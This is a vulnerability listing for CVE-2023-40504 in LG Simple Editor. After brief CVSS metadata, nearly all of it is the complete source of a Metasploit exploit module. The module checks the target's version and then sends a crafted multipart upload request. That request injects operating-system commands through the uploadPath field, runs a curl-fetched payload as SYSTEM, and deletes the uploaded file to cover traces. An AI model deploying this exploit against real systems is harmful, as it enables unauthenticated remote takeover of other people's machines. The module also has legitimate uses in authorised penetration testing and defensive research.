LG Simple Editor 3.21.0 Command Injection

2024-08-1500:00:00

rgod, Michael Heinzl, metasploit.com

packetstormsecurity.com

command injection

lg simple editor

remote execution

operating system

arbitrary commands

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

51.5%

JSON

`class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)',  
'Description' => %q{  
Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.  
The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'rgod', # Vulnerability discovery  
'Michael Heinzl' # MSF module  
],  
'References' => [  
[ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'],  
[ 'CVE', '2023-40504']  
],  
'DisclosureDate' => '2023-08-04',  
'Platform' => 'win',  
'Arch' => [ ARCH_CMD ],  
'Targets' => [  
[  
'Windows_Fetch',  
{  
'Arch' => [ ARCH_CMD ],  
'Platform' => 'win',  
'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },  
'Type' => :win_fetch,  
'Payload' => {  
'BadChars' => '\\'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])  
]  
)  
end  
  
# Determine if the Simple Editor instance runs a vulnerable version  
# copied from lg_simple_editor_rce.rb  
def check  
res = send_request_cgi(  
{  
'method' => 'GET',  
'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')  
}  
)  
  
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?  
  
version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))  
return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'  
return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
execute_command(payload.encoded)  
end  
  
def execute_command(cmd)  
print_status('Sending command injection...')  
exec_simplerce(cmd)  
print_status('Exploit finished, check thy shell.')  
end  
  
# Send command injection  
def exec_simplerce(cmd)  
filename = Rex::Text.rand_text_alpha(1..6)  
vprint_status("Using random filename: #{filename}.mp4")  
form = Rex::MIME::Message.new  
form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"")  
form.add_part("/\"&#{cmd}&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')  
form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"')  
form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"')  
form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"')  
  
res = send_request_cgi(  
{  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadVideo.do'),  
'ctype' => "multipart/form-data; boundary=#{form.bound}",  
'data' => form.to_s  
}  
)  
if res && res.code == 200  
print_good 'Command injection sent.'  
else  
fail_with(Failure::UnexpectedReply, "#{peer}: Unexpected response received.")  
end  
end  
  
end  
`